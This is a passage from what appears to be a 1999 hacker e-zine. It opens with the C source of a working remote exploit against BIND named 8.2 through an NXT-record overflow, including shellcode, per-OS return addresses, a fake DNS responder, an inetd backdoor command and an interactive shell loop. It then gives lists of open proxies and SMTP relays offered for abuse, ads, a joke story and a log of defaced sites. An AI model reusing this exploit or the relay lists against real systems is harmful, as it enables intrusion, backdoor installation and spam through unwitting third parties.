0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80, 0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0, 0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2, 0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46, 0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46, 0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9, 0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e, 0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68, 0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f, 0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0}; struct arch { int id; char *name; char *code; int codesize; unsigned long safe; unsigned long ret; int length; }; struct arch archlist[] = { {1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500}, {2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500}, {3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000}, {5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000}, {6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0} }; int arch=0; char *command=0; /* these two dns routines from dspoof/jizz */ /* pull out a compressed query name */ char *dnssprintflabel(char *s, char *buf, char *p) { unsigned 
short i,len;
  char *b=NULL;

  len=(unsigned short)*(p++);
  while (len) {
    while (len >= 0xC0) {
      if (!b)
        b=p+1;
      p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
      len=(unsigned short)*(p++);
    }

    for (i=0;i>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob ");

    b=(unsigned long*)(a+4166);

    *b++=htonl(0xdeadbeef);
    *b++=htonl(0xdeadbeef);
    *b++=htonl(archlist[arch].safe); //i2 - significant
    *b++=htonl(0xdeadbeef);
    *b++=htonl(0xdeadbeef);
    *b++=htonl(archlist[arch].safe); //i5 - significant
    *b++=htonl(0xdeadbeef);
    *b++=htonl(0xdeadbeef);

    *b++=htonl(archlist[arch].safe); //o0 - significant
    *b++=htonl(0xdeadbeef);
    *b++=htonl(archlist[arch].safe); //o2 - significant
    *b++=htonl(0xdeadbeef);
    *b++=htonl(0xdeadbeef);
    *b++=htonl(0xdeadbeef);
    *b++=htonl(archlist[arch].safe); //o6 - significant
    *b++=htonl(archlist[arch].ret); //o7 - retaddr
  }
}

int form_response(HEADER *packet, char *buf)
{
  char query[512];
  int qtype;
  HEADER *dnsh;
  char *p;
  char *walker;

  memset(buf,0,sizeof(buf));

  dnsh = (HEADER *) buf;
  dnsh->id = packet->id;
  dnsh->qr=1;
  dnsh->aa=1;
  dnsh->qdcount = htons(1);
  dnsh->ancount = htons(1);
  dnsh->arcount = htons(1);
  dnsh->rcode = 0;

  walker=(char*)(dnsh+1);

  p=dnssprintflabel(query, (char *)packet, (char*)(packet+1));
  query[strlen(query) - 1] = 0;

  qtype=*((unsigned short *)p);

  printf("%s type=%d\n",query, ntohs(qtype));

  /* first, the query */

  walker=dnsaddlabel(walker, query);
  PUTSHORT(ntohs(qtype), walker);
  //PUTSHORT(htons(T_PTR), walker);
  PUTSHORT(1,walker);

  /* then, our answer */
  /* query IN A 1.2.3.4 */

  walker=dnsaddlabel(walker, query);
  PUTSHORT(T_A, walker);
  PUTSHORT(1, walker);
  PUTLONG(60*5, walker);
  PUTSHORT(4, walker);
  sprintf(walker,"%c%c%c%c",1,2,3,4);
  walker+=4;

  /* finally, we make named do something more interesting */

  walker=dnsaddlabel(walker, query);
  PUTSHORT(T_NXT, walker);
  PUTSHORT(1, walker);
  PUTLONG(60*5, walker);

  /* the length of one label and our arbitrary data */

  PUTSHORT(archlist[arch].length+7, walker);

  PUTSHORT(6, walker);
  sprintf(walker,"admadm");
  walker+=6;
  PUTSHORT(0, walker);

  make_overflow(walker);
  walker+=archlist[arch].length;
  PUTSHORT(0, walker);
  return walker-buf;
}

#define max(x,y) ((x)>(y)?(x):(y))

int proxyloop(int s)
{
  char snd[1024], rcv[1024];
  fd_set rset;
  int maxfd, n;

  sleep(1);
  printf("Entering proxyloop..\n");
  strcpy(snd, "cd /; uname -a; pwd; id;\n");
  write(s, snd, strlen(snd));

  for (;;)
  {
    FD_SET(fileno(stdin), &rset);
    FD_SET(s, &rset);
    maxfd = max(fileno(stdin), s) + 1;
    select(maxfd, &rset, NULL, NULL, NULL);
    if (FD_ISSET(fileno(stdin), &rset))
    {
      bzero(snd, sizeof(snd));
      fgets(snd, sizeof(snd) - 2, stdin);
      write(s, snd, strlen(snd));
    }
    if (FD_ISSET(s, &rset))
    {
      bzero(rcv, sizeof(rcv));
      if ((n = read(s, rcv, sizeof(rcv))) == 0)
        exit(0);
      if (n < 0)
      {
        return -3;
      }
      fputs(rcv, stdout);
    }
  }
  return 0;
}

int main(int argc, char **argv)
{
  int s, fromlen, res, sl, s2;
  struct sockaddr_in sa, from, to;
  char buf[16384];
  char sendbuf[16384];
  unsigned short ts;
  int i;

  if (argc<2)
  {
    fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]);
    fprintf(stderr,"Available architectures:\n");
    i=-1;
    while(archlist[++i].id)
      fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name);
    exit(1);
  }

  arch=atoi(argv[1])-1;

  if (argc==3)
    command=argv[2];

  if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1)
  {
    perror("socket");
    exit(1);
  }

  bzero(&sa, sizeof sa);

  sa.sin_family=AF_INET;
  sa.sin_addr.s_addr=INADDR_ANY;
  sa.sin_port=htons(53);

  if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1)
  {
    perror("bind");
    exit(1);
  }

  do
  {
    fromlen=sizeof(from);
    if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from,
                      &fromlen)) == -1)
    {
      perror("recvfrom");
      exit(1);
    }

    printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr),
           ntohs(from.sin_port));

    sl=form_response((HEADER *)buf,sendbuf);

    /* now lets connect to the nameserver */

    bzero(&to, sizeof(to));
    to.sin_family=AF_INET;
    to.sin_addr=from.sin_addr;
    to.sin_port=htons(53);

    if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1)
    {
      perror("socket");
      exit(1);
    }

    if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1)
    {
      perror("connect");
      exit(1);
    }

    ts=htons(sl);
    write(s2,&ts,2);

    write(s2,sendbuf,sl);
    if (archlist[arch].safe>1)
      close(s2);
  } while (archlist[arch].safe>1); /* infinite loop for sparc */
  proxyloop(s2);
  exit(1);
}

@HWA

54.0 Current snapshot of the CYBERARMY lists. Proxies, etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Check these lists and see if YOUR box is listed here as it can be abused
     by malicious crackers and net miscreants to wreak havoc and spam networks.
     - Ed

     [ Proxies: ]
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     [ Wingates ]
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
11/02/99 14:28:26 EST by tmz] a00213.sjrp.mandic.com.br [latency: 11/02/99 14:09:59 EST by ursuletz] 205.188.209.44 [latency: 11/02/99 10:20:31 EST by paula] li-9-25.cytanet.com.cy [latency: 11/02/99 06:11:46 EST by ursuletz] host13.image-entertainment.com [latency: 11/02/99 05:47:25 EST by ursuletz] pm3-0-6.hm.ayrix.net [latency: 11/02/99 05:45:27 EST by ursuletz] mail.trutnov.cz [latency: 11/02/99 05:43:29 EST by ursuletz] server.goway.com [latency: 11/02/99 05:31:19 EST by ursuletz] Telezimex.ro [latency: 11/02/99 05:29:24 EST by ursuletz] interate.com.pe [latency: 11/02/99 05:28:21 EST by ursuletz] sai0103.erols.com [latency: 11/02/99 05:23:50 EST by alex] cx796116-a.pv1.ca.home.com [latency: 11/01/99 22:47:20 EST by ASSha] 24.5.158.92 [latency: 11/01/99 22:46:43 EST by ASSha] 202.54.6.1 [latency: 11/01/99 02:19:03 EST by test] nilko.com [latency: 10/31/99 19:37:28 EST by SiRiUs] battle.net [latency: 10/31/99 17:48:29 EST] i400.zbrojovka.com [latency: 10/31/99 16:29:17 EST] [ SMTP Relay hosts ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mailhub.iastate.edu [latency: 11/15/99 23:15:00 EST by sara] mailserver.collegeclub.com [latency: 11/15/99 19:39:13 EST by digicrash] smtp2.serverdienst.de [latency: 11/15/99 10:21:06 EST by Aldi_Provider_Killer] mailx.reseller.de [latency: 11/15/99 10:20:34 EST by Aldi_Provider_Killer] mail.telepac.pt [latency: 11/14/99 08:39:59 EST by Volture] smtp.prodigy.net [latency: 11/13/99 22:27:18 EST by Trac3] email.dnet.net [latency: 11/12/99 17:59:12 EST by wayne hiatt] smtp.rad.net.id [latency: 11/09/99 16:31:49 EST by adsf] nuhsd.k12.ca.us [latency: 11/09/99 16:04:57 EST by The Guy] mail.formsuk.com [latency: 11/08/99 00:11:21 EST by weirdo] smtp.freeaccount.com [latency: 11/07/99 19:33:07 EST by Spammmer] smtp.earthlink.net [latency: 11/07/99 19:32:01 EST by The Guy] mail.politie.nl [latency: 11/06/99 15:15:15 EST by its a police server!] 
[ Accounts list (mainly bogus, some legit try em and see) ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@HWA

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*****************************************************************************
*                                                                           *
*   ATTRITION.ORG   http://www.attrition.org                                *
*   ATTRITION.ORG   Advisory Archive, Hacked Page Mirror                    *
*   ATTRITION.ORG   DoS Database, Crypto Archive                            *
*   ATTRITION.ORG   Sarcasm, Rudeness, and More.                            *
*                                                                           *
*****************************************************************************

When people ask you "Who is Kevin Mitnick?" do you have an answer?

www.2600.com www.freekevin.com www.kevinmitnick.com
########################################
# Support 2600.com and the Free Kevin  #
# defense fund site, visit it now!     #
#             FREE KEVIN!              #
########################################

http://www.2600.com/ http://www.kevinmitnick.com

+-----------------------------------------------------------------------------+
| SmoG Alert ..        http://smog.cjb.net/   NEWS on SCIENCE                 |
| ===================  http://smog.cjb.net/   NEWS on SECURITY                |
| NEWS/NEWS/NEWS/NEWS  http://smog.cjb.net/   NEWS on THE NET                 |
|                      http://smog.cjb.net/   NEWS on TECHNOLOGY              |
+-----------------------------------------------------------------------------+

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* http://www.csoft.net   One of our sponsors, visit them now    www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to        //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed          //
// or cruciphux@dok.org                                                    //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous...

Hacker Horror 1: "Tell-Tale Voltage Regulator"

Late one night, in the basement of his work, Harold was recompiling his kernel for the 15th time that week. "Maybe one day, I'll have a kernel that works!" thought Harold. One of Harold's problems was that he only had a 386DX25 with 4 megs of ram to work with. The accountants all got the P166's with 32 megs of ram.

After the compile was completed he installed it and proceeded to reboot his system. Everything appeared to be working normally, except for one thing... "FOR CRYING OUT LOUD!!, I forgot to compile the crappy ethernet card support!!"
In frustration, Harold slammed his fist down on the keyboard, then lifted the monitor and threw it across the room. As the small fire created by the exploding monitor burned down, he realized what he had done. His boss would kill him if he found out! There was only one thing to do... hide the evidence and claim that his monitor had been stolen!

Luckily, they were doing some work on the Second floor, and one of the walls was not yet completed. Harold threw the monitor onto a push cart and put a box over it. He knew that no one should be in the building, but just in case. He got to the elevator without anyone seeing him. He pushed the elevator call button and waited for what seemed to be an eternity. Finally the elevator opened.

"Hey Harold, how's it going?"

FOR PETE'S SAKE! It was security...

"Uh, nothing much, just taking this up to 2nd floor to replace a monitor one of the secretaries said had a color problem." It sounded good, good enough.

The security guard looked at Harold, for a minute he thought something, Harold looked very white, and was sweating profusely. But then, he was a typical hacker, so that didn't mean anything. "Alright, just be sure to lock the doors behind you..."

Harold boarded the elevator and pressed 2. Now that he had passed the security guard, nothing should stand in his way.

On the second floor, there was a section of wall that wasn't quite done yet. Harold threw the broken monitor in there, and quickly threw up a piece of drywall and nailed it down. Using skills he had learned from his father, a carpenter, he quickly spread the plaster all around, liberally. He didn't think that anyone would notice that the wall had gotten done early... he ran past one of the secretaries' desks and opened the drawers... sure enough, he found a hair dryer. He used the hair dryer to quickly dry the plaster... grabbed a power sander and finished the job. Last but not least he grabbed a vacuum and sucked up all the dust.

"But what is it missing??" Paint.
He needed paint, but he couldn't find any. Quickly he found a post it note and scrawled in his best handwriting (the best handwriting for a hacker anyway) 'BOB, I FINISHED THE WALL, COULDN'T FIND PAINT..'. Never mind the fact he didn't know who Bob was, but there was always a Bob working somewhere, so it sounded good. Harold got back on the elevator and made it back to his room safely... he wrote a note to his boss that his monitor had been stolen and went home.

The next day Harold came in to work and was greeted by his boss. "Monitor stolen?", his boss questioned him about it. Harold told him that he had left the room unlocked accidentally and probably someone from Maintenance took it. He looked as convincing as he could.

"Okay" the boss said, "Get one out of storage, I hope you don't mind using an EGA monitor for a while, it's all we've got left..".

Doesn't matter, thought Harold, I only use text based OSs anyway.

"Oh and by the way, Harold, a secretary up on the second floor says that he can't see the network, can you look into it?"

"Sure, I'll go right up".

As Harold boarded the elevator, he thought of how clever he was to get out of trouble. He especially had a big smile on his face when he reached the second floor and saw Maintenance painting that wall. He went over to the secretary's desk and found that the guy's network connection had been removed. No big deal. He went back down the hall, but something stopped him. From behind the wall where he had hid the monitor, he heard a slight and high pitched "Whiiizzzzzzzzz". He thought about it for a moment... but nah... couldn't be...

Later that evening as he was about ready to type make zlilo for the 16th time, his boss popped in his office and said, "They're having network problems again, and this time it's not the cable being unplugged...".

"Okay, I'll look into it." Harold quickly hit return, and left the room. There is nothing I could have forgotten in the kernel this time, I have everything supported...
HAHAHAHA!

As he walked past his wall, he again heard the slight, "Whiiizzzzzzzz" from behind the wall. He thought about it for a moment as the security guard walked up...

"Funny thing your monitor being stolen... I didn't see anyone but you here all last night!"

"Listen, perhaps if you had been doing your job a little better I would still have a monitor!" Harold shouted back. The security guard was taken aback. The whiiizzzz became louder. "What's that noise?" Harold demanded.

The security guard looked puzzled. "Harold, you are weird." The security guard left.

Harold continued on to the problem computer. "Why isn't this seeing the network, all the drivers are loading properly!" He checked the connections, he checked the hub, and he even replaced the NIC. As he turned off the computer to reboot, the high pitched whiiizzz became very loud....

"CUT IT OUT!!" Harold shouted. No one could hear him because no one was there. Harold ran to one of the maintenance walls and flipped the breaker to turn off all of the power on that floor. The whiiiizzz noise only became louder. He turned the power back on and grabbed a fire axe from the wall, setting off the fire alarm. But Harold couldn't hear the fire alarm. All he could hear was the Monitor from hell, its noises raging from behind the wall. He took the axe and chopped down the wall. "DAMN YOU! I WILL KILL YOU ONCE AND FOR ALL!!"

The security guard rushed up behind him and startled Harold. "What the hell do you think you are doing??" demanded the security guard. Harold didn't even look at him, he kept chopping at the wall. The security guard was perplexed, so he drew his weapon. "I ORDER YOU TO STOP NOW HAROLD!!".

Harold pleaded "I HAVE TO MAKE IT STOP!! I HAVE TO MAKE IT STOP!!"

"Make what stop?"

"The Monitor, IT WON'T QUIT!! IT IS TRYING TO DRIVE ME INSANE!!".

The security guard was speechless and didn't know what to do. Harold kept chopping at the wall.
Finally it caved in, Harold climbed in the wall and grabbed the monitor. "HAHAHA! I HAVE YOU NOW YOU MONITOR FROM HELL!!!!". That was the last thing Harold said before he discharged the High Voltage area across his hand. The charge went up his arm, and into his brain. Harold collapsed...

-epilogue-

Harold woke up in the hospital.. still shaken. He didn't know what had happened, the shock had made him forget. After he left the hospital, he went back to work. His boss felt sorry for him and gave him his old job back, but had hired someone to take his place in his absence. Harold went downstairs to his computer and flicked the switch to turn it on. The computer breathed to life, Harold was pleased to be back where he belonged, in front of a computer. They even fixed his monitor, and he had a brand new 15" SVGA monitor. He turned around to get a can of jolt out of the 'fridge and when he turned back, Harold screamed in horror. A scream so loud that it could be heard clear to the 5th floor. For his monitor was displaying something that could not be explained, something that terrified him past all sanity. His monitor was saying "Starting Windows 95...."

@HWA

SITE.1

http://www.xteq.com/products/xset/

X-Setup windows hacker

Cool product (it's FREE) for Windows 9x users, this utility Xsetup is similar in function to TweakUI only has a lot more options and also has plugins. Well worth checking out. Site was a little slow; I found that downloading from the 'softwareforfree' links was the best bet for thru-put.

You can send in submissions for this section too if you've found (or RUN) a cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz, racism is a mug's game!
- Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while, for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist.

>Start<

Defaced domain: www.safeandsecure.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.safeandsecure.net
Defaced by: highkidz
Operating System: Linux
Date 11/09/99

Defaced domain: www.synrgy.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.synrgy.com
Defaced by: Foam
Operating System: Windows NT (IIS/4.0)
Date 11/09/99

Defaced domain: www.ntinow.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/08/www.ntinow.com
Defaced by: Foam
Operating System: Windows NT (IIS/4.0)
Date 11/09/99

Defaced domain: biosys.bre.orst.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/biosys.bre.orst.edu
Defaced by: Narcissus
Operating System: Windows NT (IIS/4.0)
Date 11/09/99

Defaced domain: www.inlis.gov.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.inlis.gov.sg
Defaced by: Sarin
Operating System: Windows NT
Date 11/09/99

Defaced domain: www.samofa.gov.sa
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.samofa.gov.sa
Defaced by: Sarin
Operating System: Windows NT (IIS/4.0)
Date 11/09/99

Defaced domain: devens-www.army.mil
Mirror: attrition.org/mirror/attrition/1999/11/09/devens-www.army.mil
Defaced by: unknown
Date 11/09/99

Defaced domain: www.rmd.belvoir.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.rmd.belvoir.army.mil
Defaced by: hV2k
Operating System: Windows NT
Date 11/09/99

Defaced domain: lickass.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/lickass.net
Defaced by: cowhead2000
Operating System: Linux (Apache 1.3.6)
Date 11/09/99

Defaced domain: www.timmonsmicro.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.timmonsmicro.com
Defaced by: sSh
Operating System: Linux (Red Hat) (Apache 1.3.3)
Date 11/09/99

Defaced domain: www.aiasp.com.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.aiasp.com.tw
Defaced by: DHC
Operating System: Windows NT (IIS/4.0)
Date 11/09/99

Defaced domain: uranos.rz.uni-osnabrueck.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/uranos.rz.uni-osnabrueck.de
Defaced by: Narcissus
Operating System: Windows NT (Apache 1.3.6 Win32)
Date 11/09/99

Defaced domain: www.safeandsecure.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.safeandsecure.net
Defaced by: sSh
Operating System: Linux (Red Hat) (Apache 1.3.3)
Date 11/09/99

Defaced domain: www.cmssoft.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.cmssoft.com
Defaced by: w0lf
Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage)
Date 11/09/99

Defaced domain: correo.inta.gov.ar
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/correo.inta.gov.ar
Defaced by: hacking 4 ponies
Operating System: Linux
Date 11/09/99

Defaced domain: linukz.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/linukz.net
Defaced by: R3dPriest
Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
Date 11/09/99

Defaced domain: w3.pica.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/w3.pica.army.mil
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/10/99

Defaced domain: www.omh.state.ny.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.omh.state.ny.us
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/10/99

Defaced domain: www.cbacareer.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.cbacareer.com
Defaced by: kryptek
Operating System: Solaris 2.5x (Netscape-Enterprise/3.0C)
Date 11/10/99

Defaced domain: www.nypa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.nypa.gov
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/10/99

Defaced domain: www.twu.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.twu.ca
Defaced by: hackcanada.com
Operating System: Windows NT (IIS/4.0)
Date 11/10/99

Defaced domain: www.futuresuperstock.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/10/www.futuresuperstock.com
Defaced by: Narcissus
Operating System: Windows NT (IIS/3.0)
Date 11/10/99

Defaced domain: www.soften.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/10/www.soften.com
Defaced by: c0ax
Operating System: Windows NT
Date 11/10/99

Defaced domain: afford2.netc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/afford2.netc.com
Defaced by: hell
Operating System: Windows 95
Date 11/11/99

Defaced domain: abraham.eng.buffalo.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/abraham.eng.buffalo.edu
Defaced by: section8
Operating System: Windows NT
Date 11/11/99

Defaced domain: ceserver.jpl.nasa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/ceserver.jpl.nasa.gov
Defaced by: Uneek Technologies
Operating System: Windows NT
Date 11/11/99

Defaced domain: www.ci.beverly-hills.ca.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.ci.beverly-hills.ca.us
Defaced by: kryptek
Operating System: Solaris
Date 11/11/99

Defaced domain: www.manningham.vic.gov.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.manningham.vic.gov.au
Defaced by: ned rubenschlachen
Operating System: Windows NT
Date 11/11/99

Defaced domain: airsar.jpl.nasa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/airsar.jpl.nasa.gov
Defaced by: dukj
Operating System: Windows NT
Date 11/11/99

Defaced domain: www.rucker.amedd.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.rucker.amedd.army.mil
Defaced by: hV2k
Operating System: Windows NT
Date 11/11/99

Defaced domain: www.unitedskins.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.unitedskins.com
Defaced by: SunDevil
Operating System: Windows NT
Date 11/11/99

Defaced domain: www.mda.state.mn.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.mda.state.mn.us
Defaced by: hV2k
Operating System: Windows NT
Date 11/11/99

Defaced domain: www.wgrlc.vic.gov.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.wgrlc.vic.gov.au
Defaced by: dukj
Operating System: Windows NT
Date 11/11/99

Defaced domain: www.dcjs.state.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.dcjs.state.va.us
Defaced by: twd
Operating System: Windows NT
Date 11/11/99

Defaced domain: www.plebius.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.plebius.org
Defaced by: z0z
Operating System: Bf
Date 11/11/99

Defaced domain: www.palacewizard.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.palacewizard.com
Defaced by: kryptek
Operating System: Solaris 2.5x (Netscape-Enterprise/2.01c)
Date 11/11/99

Defaced domain: www.racquel.eroticvideos.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.racquel.eroticvideos.com
Defaced by: kryptek
Operating System: Solaris 2.5x (Netscape-Enterprise/2.01c)
Date 11/11/99

Defaced domain: corp.jkr.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/corp.jkr.gov.my
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/11/99

Defaced domain: www.2rotc.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.2rotc.army.mil
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/11/99

Defaced domain: www.apa.state.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.apa.state.va.us
Defaced by: twd
Operating System: Windows NT (IIS/4.0)
Date 11/11/99

Defaced domain: ene.gov.on.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/ene.gov.on.ca
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/11/99

Defaced domain: fmprc.gov.cn
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/fmprc.gov.cn
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/11/99

Defaced domain: intra.taipei.gov.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/intra.taipei.gov.tw
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99

Defaced domain: www.commercialpro.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.commercialpro.com
Defaced by: PHC
Operating System: Windows NT (IIS/4.0)
Date 11/12/99

Defaced domain: mineco.fgov.be
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/mineco.fgov.be
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99

Defaced domain: pyxis.stf.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/pyxis.stf.gov.br
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99

Defaced domain: shop.gov.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/shop.gov.sg
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99

Defaced domain: shjlib.gov.ae
